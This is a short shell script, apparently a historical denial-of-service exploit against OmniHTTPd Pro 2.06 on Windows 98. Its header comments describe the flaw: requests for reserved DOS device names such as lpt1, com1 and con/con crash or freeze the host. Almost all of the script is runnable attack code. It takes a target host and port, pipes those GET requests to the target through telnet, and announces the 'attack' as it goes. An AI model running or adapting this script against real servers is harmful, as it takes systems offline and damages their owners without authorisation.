#!/bin/sh
#
# Vulnerable versions:
#     Omni Httpd pro v.2.06 Win98 (NT not tested)
# 
# The problem:
#     It is possible to crash remote system because OmniHttpD (version: Pro. v2.06, maybe others) parse the 
# path strings to call some FAT32/VFAT routines in the kernel which makes your system unstable and useless until next reboot.
#
# Fix:
#     Unknown for now, I mailed Omnicron Technologies ... they will probably fix this bug 
#     in next version.
#
# About:
#     Discovered by: sirius from b0f	 	
#     Coded by: sirius from buffer0vefl0w security (b0f)
#     [http://b0f.freebsd.lublin.pl]

if [ "$1" = "" ]; then 
	echo "OmniHTTPd v.2.06 DoS attack"
	echo
	echo "Coded: sirius from buffer0vefl0w security (b0f)"
	echo "[http://b0f.freebsd.lublin.pl]"
	echo
	echo "Usage: $0 <host> <port>"
	echo
	exit 1
fi

echo "Launching attack ... please wait "

# this will crash some devices, but if modem is on comX the code after line with comX will not 
# be executed ... you can change the order of execution ;)

(echo "GET /lpt1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /lpt2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com1" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com2" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com3" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com4" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null
(echo "GET /com5" ; sleep 5) | telnet $1 $2 1>/dev/null 2>/dev/null

# the following code will crash/freeze/make system busy/how to call it? system

(echo "GET /aux" ; sleep 5) | telnet $1 80 1>/dev/null 2>/dev/null
(echo "GET /con/con" ; sleep 5) |telnet $1 80 1>/dev/null 2>/dev/null

echo "Crash code send ..."
killall -9 telnet 2>/dev/null 1> /dev/null
echo "Done!"